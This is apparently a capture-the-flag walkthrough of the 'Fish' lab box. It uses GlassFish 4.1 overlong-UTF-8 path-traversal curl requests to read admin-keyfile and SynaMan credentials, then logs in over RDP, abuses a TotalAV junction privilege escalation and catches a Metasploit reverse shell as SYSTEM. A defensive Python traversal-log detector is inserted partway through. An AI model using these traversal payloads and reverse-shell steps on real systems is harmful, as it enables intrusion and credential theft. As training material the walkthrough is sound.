June 16, 2026
Fish | Proving Grounds | OSCP Preparation
Box: Fish Community Rating: Hard
SilentExploit
Start off with a quick nmap scan of the target:
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-16 16:26 BST
Initiating Parallel DNS resolution of 1 host. at 16:26
Completed Parallel DNS resolution of 1 host. at 16:26, 0.02s elapsed
Initiating SYN Stealth Scan at 16:26
Scanning 192.168.238.168 [65535 ports]
Discovered open port 445/tcp on 192.168.238.168
Discovered open port 3389/tcp on 192.168.238.168
Discovered open port 135/tcp on 192.168.238.168
Discovered open port 8080/tcp on 192.168.238.168
Discovered open port 139/tcp on 192.168.238.168
Discovered open port 49669/tcp on 192.168.238.168
Discovered open port 6060/tcp on 192.168.238.168
Discovered open port 49716/tcp on 192.168.238.168
Discovered open port 49665/tcp on 192.168.238.168
Discovered open port 49666/tcp on 192.168.238.168
Discovered open port 8686/tcp on 192.168.238.168
Discovered open port 49664/tcp on 192.168.238.168
Discovered open port 3700/tcp on 192.168.238.168
Discovered open port 7680/tcp on 192.168.238.168
Discovered open port 7676/tcp on 192.168.238.168
Discovered open port 49667/tcp on 192.168.238.168
Discovered open port 8181/tcp on 192.168.238.168
Discovered open port 4848/tcp on 192.168.238.168
Discovered open port 49670/tcp on 192.168.238.168
Discovered open port 5040/tcp on 192.168.238.168
Completed SYN Stealth Scan at 16:26, 13.86s elapsed (65535 total ports)
Nmap scan report for 192.168.238.168
Host is up (0.042s latency).
Not shown: 58321 closed tcp ports (reset), 7194 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
3700/tcp open lrs-paging
4848/tcp open appserv-http
5040/tcp open unknown
6060/tcp open x11
7676/tcp open imqbrokerd
7680/tcp open pando-pub
8080/tcp open http-proxy
8181/tcp open intermapper
8686/tcp open sun-as-jmxrmi
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49716/tcp open unknown
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds
Raw packets sent: 90071 (3.963MB) | Rcvd: 58341 (2.334MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-16 16:26 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:26
Completed NSE at 16:26, 0.00s elapsed
Initiating NSE at 16:26
Completed NSE at 16:26, 0.00s elapsed
Initiating NSE at 16:26
Completed NSE at 16:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:26
Completed Parallel DNS resolution of 1 host. at 16:26, 0.02s elapsed
Initiating SYN Stealth Scan at 16:26
Scanning 192.168.238.168 [1000 ports]
Discovered open port 135/tcp on 192.168.238.168
Discovered open port 8080/tcp on 192.168.238.168
Discovered open port 445/tcp on 192.168.238.168
Discovered open port 3389/tcp on 192.168.238.168
Discovered open port 139/tcp on 192.168.238.168
Discovered open port 8181/tcp on 192.168.238.168
Discovered open port 7676/tcp on 192.168.238.168
Discovered open port 4848/tcp on 192.168.238.168
Completed SYN Stealth Scan at 16:26, 1.60s elapsed (1000 total ports)
Initiating Service scan at 16:26
Scanning 8 services on 192.168.238.168
Completed Service scan at 16:26, 23.79s elapsed (8 services on 1 host)
NSE: Script scanning 192.168.238.168.
Initiating NSE at 16:26
Completed NSE at 16:27, 8.62s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 1.48s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.01s elapsed
Nmap scan report for 192.168.238.168
Host is up (0.027s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fishyyy
| Issuer: commonName=Fishyyy
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-28T14:22:03
| Not valid after: 2022-04-29T14:22:03
| MD5: e6aa:9f17:f528:3bd0:e3e0:0cd1:52a5:1ae7
|_SHA-1: dd7f:2a71:abac:ea7f:198a:a320:f95d:e9b2:7e5e:8e4a
|_ssl-date: 2021-10-29T14:27:05+00:00; -4y230d01h00m04s from scanner time.
| rdp-ntlm-info:
| Target_Name: FISHYYY
| NetBIOS_Domain_Name: FISHYYY
| NetBIOS_Computer_Name: FISHYYY
| DNS_Domain_Name: Fishyyy
| DNS_Computer_Name: Fishyyy
| Product_Version: 10.0.19041
|_ System_Time: 2021-10-29T14:26:56+00:00
4848/tcp open http Sun GlassFish Open Source Edition 4.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Login
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-favicon: Unknown favicon MD5: EDABDF0241D12BB4AFF219C2B064486A
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
|_http-title: Data Web
8181/tcp open ssl/http Sun GlassFish Open Source Edition 4.1
|_http-server-header: GlassFish Server Open Source Edition 4.1
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Issuer: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2014-08-21T13:30:10
| Not valid after: 2024-08-18T13:30:10
| MD5: 594f:8111:2179:0c71:532a:00ab:223e:0e8a
|_SHA-1: 1ff8:eff1:b17d:c744:191e:213a:3102:9aa7:5982:a63c
|_ssl-date: TLS randomness does not represent time
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
|_http-title: Data Web
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2021-10-29T14:26:57
|_ start_date: N/A
|_clock-skew: mean: -1691d01h00m04s, deviation: 0s, median: -1691d01h00m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
NSE: Script Post-scanning.
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.10 seconds
Raw packets sent: 1011 (44.484KB) | Rcvd: 1000 (40.032KB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-16 16:27 BST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:27
Completed NSE at 16:27, 10.03s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating Ping Scan at 16:27
Scanning 192.168.238.168 [4 ports]
Completed Ping Scan at 16:27, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:27
Completed Parallel DNS resolution of 1 host. at 16:27, 0.01s elapsed
Initiating SYN Stealth Scan at 16:27
Scanning 192.168.238.168 [1000 ports]
Discovered open port 139/tcp on 192.168.238.168
Discovered open port 8080/tcp on 192.168.238.168
Discovered open port 445/tcp on 192.168.238.168
Discovered open port 3389/tcp on 192.168.238.168
Discovered open port 135/tcp on 192.168.238.168
Discovered open port 8181/tcp on 192.168.238.168
Discovered open port 7676/tcp on 192.168.238.168
Discovered open port 4848/tcp on 192.168.238.168
Completed SYN Stealth Scan at 16:27, 1.53s elapsed (1000 total ports)
NSE: Script scanning 192.168.238.168.
Initiating NSE at 16:27
Completed NSE at 16:28, 46.55s elapsed
Initiating NSE at 16:28
Completed NSE at 16:28, 0.21s elapsed
Nmap scan report for 192.168.238.168
Host is up (0.027s latency).
Not shown: 992 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
4848/tcp open appserv-http
7676/tcp open imqbrokerd
8080/tcp open http-proxy
|_http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
|_/index.php source code:
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /sdk/../../../../../../../etc/vmware/hostd/vmInventory.xml: Possible path traversal in VMWare (CVE-2009-3733)
| /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml: Possible path traversal in VMWare (CVE-2009-3733)
| /../../../../../../../../../../etc/passwd: Possible path traversal in URI
| /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_ ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb: Possible iPhone/iPod/iPad generic file sharing app Directory Traversal (iOS)
8181/tcp open intermapper
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
NSE: Script Post-scanning.
Initiating NSE at 16:28
Completed NSE at 16:28, 0.00s elapsed
Initiating NSE at 16:28
Completed NSE at 16:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 58.73 seconds
Raw packets sent: 1010 (44.416KB) | Rcvd: 1001 (40.060KB)
I spent some time going through SMB and RPC to probe for potential weaknesses.
Once this wrapped up I moved on to manually enumerating the ports / services.
Port 4848
Sun GlassFish Open Source Edition 4.1. This is basically an open-source, production-ready Java EE 7 application server running on the target. The fact that we have a login form for it was a smoking gun.
I tried common default credentials and made some attempts at brute forcing here but had no success.
Searchsploit then revealed that we have Directory Traversal vulnerabilities in this exact version:
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# searchsploit 'Oracle GlassFish'
-------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------- ---------------------------------
Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit) | linux/webapps/45198.rb
Oracle GlassFish Server - Administration Console Authentication Byp | windows/webapps/17276.txt
Oracle GlassFish Server - REST Cross-Site Request Forgery | windows/webapps/18766.txt
Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resourc | multiple/remote/38802.txt
Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scri | windows/webapps/18764.txt
Oracle GlassFish Server 4.1 - Directory Traversal | multiple/webapps/39441.txt
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (M | windows/webapps/45196.rb
Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (M | windows/webapps/45196.rb
Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scri | jsp/webapps/17551.txt
Sun/Oracle GlassFish Server - (Authenticated) Code Execution (Metas | jsp/webapps/17615.rb
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Grab a copy of the traversal PoC and you'll see it contains clear instructions on how to perform the attack, i.e. how to read arbitrary files on the target:
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# searchsploit -m multiple/webapps/39441.txt
Exploit: Oracle GlassFish Server 4.1 - Directory Traversal
URL: https://www.exploit-db.com/exploits/39441
Path: /usr/share/exploitdb/exploits/multiple/webapps/39441.txt
Codes: CVE-2017-1000028
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /run/media/user/2024/HTBox/fish/39441.txt
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# cat 39441.txt
Trustwave SpiderLabs Security Advisory TWSL2015-016:
Path Traversal in Oracle GlassFish Server Open Source Edition
Published: 08/27/2015
Version: 1.0
Vendor: Oracle Corporation (Project sponsored by Oracle)
Product: GlassFish Server Open Source Edition
Version affected: 4.1 and prior versions
Product description:
Built using the GlassFish Server Open Source Edition, Oracle GlassFish
Server delivers a flexible, lightweight and extensible Java EE 6 platform.
It provides a small footprint, fully featured Java EE application server
that is completely supported for commercial deployment and is available as
a standalone offering.
The Administration Console of Oracle GlassFish Server, which is listening
by default on port 4848/TCP, is prone to a directory traversal
vulnerability. This vulnerability can be exploited by remote attackers to
access sensitive data on the server being authenticated.
<SNIP>
Example:
REQUEST
========
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
This attack specifically targets port 4848/tcp (which we know is open and running the service as per our nmap scan). So, I went ahead and tested the vulnerability against /windows/win.ini:
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# curl http://$target:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini --path-as-is
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Now, I targeted specific files in the GlassFish configuration that may contain credentials / passwords. The admin key file was suggested as a potential avenue so I went ahead and retrieved it:
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# curl http://$target:4848/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afglassfish4/glassfish/domains/domain1/config/admin-keyfile --path-as-is
admin;{SSHA256}aLatQQ3qEJHinsX4N/+V/45mJwFSkXN5w7vz3P6kHy4jrX+U7hXCkQ==;asadmin
This confirms that the username is admin BUT I was unable to make any headway with cracking the hash.
I will say that if you're in a scenario where you have a directory traversal vulnerability but can't seem to make headway: pivot to other services running on the target as they may also have configuration files containing passwords.
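The traversal above works because the server's lenient UTF-8 handling turns the overlong sequence %c0%af into a plain '/', so a filter looking for literal "../" never sees it. As an added example (not part of the original walkthrough or of GlassFish), here is a small detector that decodes request paths the same lenient way, normalises them, and flags traversal attempts and requests for files such as admin-keyfile in constructed access-log lines:

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (client, method, raw request path,
# status). These are made up for the example; none are from a real server.
SAMPLE_LOG = """\
192.0.2.10 GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 200
192.0.2.10 GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%afglassfish4/glassfish/domains/domain1/config/admin-keyfile 200
192.0.2.11 GET /theme/META-INF/json/prototype.js 200
192.0.2.12 GET /common/..%2f..%2fetc/passwd 404
192.0.2.13 GET /theme/com/sun/webui/jsf/suntheme/images/login.png 200
"""

LINE_RE = re.compile(r'^(?P<client>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$')
# Percent-encoded C0/C1 lead byte followed by a continuation byte: an overlong form.
OVERLONG_RE = re.compile(r'%c[01]%[89ab][0-9a-f]', re.IGNORECASE)
# File names that should never be reachable through the web tier (assumed list).
SENSITIVE_SUFFIXES = ('/admin-keyfile', '/domain.xml', '/keyfile', '/win.ini', '/etc/passwd')


def decode_overlong_utf8(raw: bytes) -> str:
    """Decode bytes as UTF-8, additionally accepting the two-byte overlong
    forms (C0/C1 followed by a continuation byte) that a lenient decoder
    turns into plain ASCII: C0 AF -> '/', C0 AE -> '.'. This mirrors the
    lenient behaviour the traversal relies on, so the detector sees the
    same path the vulnerable server saw."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode('utf-8', errors='replace')


def normalize_path(raw_path: str) -> tuple[str, str, int]:
    """Return (decoded, normalised, escapes): the fully percent-decoded path,
    the path with '.' and '..' segments resolved, and how many '..' segments
    tried to climb above the root."""
    decoded = raw_path
    for _ in range(3):  # repeat to undo double/triple encoding
        nxt = decode_overlong_utf8(unquote_to_bytes(decoded))
        if nxt == decoded:
            break
        decoded = nxt
    segments: list[str] = []
    escapes = 0
    for seg in decoded.replace('\\', '/').split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if segments:
                segments.pop()
            else:
                escapes += 1
            continue
        segments.append(seg)
    return decoded, '/' + '/'.join(segments), escapes


def classify(raw_path: str) -> list[str]:
    """Reasons a request path looks like a traversal attempt (empty if clean)."""
    reasons = []
    if OVERLONG_RE.search(raw_path):
        reasons.append('overlong-utf8')
    decoded, norm, escapes = normalize_path(raw_path)
    if '..' in decoded.replace('\\', '/').split('/'):
        reasons.append('dot-dot')
    if escapes:
        reasons.append('root-escape')
    if norm.lower().endswith(SENSITIVE_SUFFIXES):
        reasons.append('sensitive-target')
    return reasons


def analyze_log(text: str) -> list[dict]:
    """Run classify() over every parseable log line; return only the hits."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        reasons = classify(m['path'])
        if reasons:
            _, norm, _ = normalize_path(m['path'])
            findings.append({'client': m['client'], 'raw': m['path'],
                             'normalized': norm, 'status': int(m['status']),
                             'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['client']} {f['status']} {f['normalized']} <- {', '.join(f['reasons'])}")
```

The same normalisation is what a web tier should apply before any allow-list check; note that a 200 on a sensitive path is the signal to escalate, since the traversal here needs no authentication.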
Port 6060
SynaMan 5.1 (Synametrics File Manager) is an on-premises, secure file-sharing and remote access platform. It allows users to share large files, map drives and access local files from any web browser or mobile device without needing a complicated web server setup.
Where does SynaMan store plain text credentials?
Use your traversal ability to grab this file.
Here you can see you have a smtpPassword (KingOfAtlantis) and a smtpUser (Arthur).
Netexec confirms these credentials are valid for RDP (note: just because credentials show as successful for RDP doesn't mean they will work — netexec is just 'knocking the door' to let you know whether the creds are valid):
┌──(root㉿user)-[/run/…/user/2024/HTBox/fish]
└─# nxc rdp $target -u arthur -p KingOfAtlantis
RDP 192.168.170.168 3389 FISHYYY [*] Windows 10 or Windows Server 2016 Build 19041 (name:FISHYYY) (domain:Fishyyy) (nla:False)
RDP 192.168.170.168 3389 FISHYYY [+] Fishyyy\arthur:KingOfAtlantis (Pwn3d!)
Privilege Escalation
With shell access as Arthur we can get straight to work enumerating the desktop via RDP.
┌──(venv)─(root㉿user)-[/home/user/Downloads/dirsearch]
└─# xfreerdp3 /v:192.168.170.168 /u:arthur /p:'KingOfAtlantis' /cert:ignore /dynamic-resolution /drive:tools,/run/media/user/2024/HTBox/tools
Once in, you should see a TotalAV window pop up. TotalAV is a comprehensive antivirus and digital security suite designed to protect devices against malware, ransomware and phishing attacks, much like McAfee, Norton etc.
I then navigated to the application directory and checked the details of the application binary to confirm the version: 4.14.31.0.
This exploit leverages a local privilege escalation flaw in this exact version of TotalAV. It works by deliberately forcing the antivirus to quarantine a specific malicious file. Using an NTFS directory junction, the application's restore mechanism is manipulated into redirecting the quarantined file into a restricted directory, allowing code to execute with elevated system permissions.
There is a tutorial video on how to carry out the exact exploit here
- Createmountpoint.exe — download here
As the video provides clear step-by-step guidance I chose not to replicate its contents here, BUT once you reach the very end of the process and need a reboot to trigger the malicious DLL, you won't have the option to click 'Restart' in the Start menu.
To restart the machine, simply use PowerShell's built-in restart cmdlet to reboot and you should receive your shell shortly.
┌──(root㉿user)-[/home/user]
└─# msfconsole -q
msf > use /exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.45.180
LHOST => 192.168.45.180
msf exploit(multi/handler) > show options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted:
'', seh, thread, process,
none)
LHOST 192.168.45.180 yes The listen address (an int
erface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.45.180:4444
[*] Sending stage (188998 bytes) to 192.168.238.168
[*] Meterpreter session 1 opened (192.168.45.180:4444 -> 192.168.238.168:49708) at 2026-06-16 16:22:12 +0100
meterpreter > shell
Process 4896 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system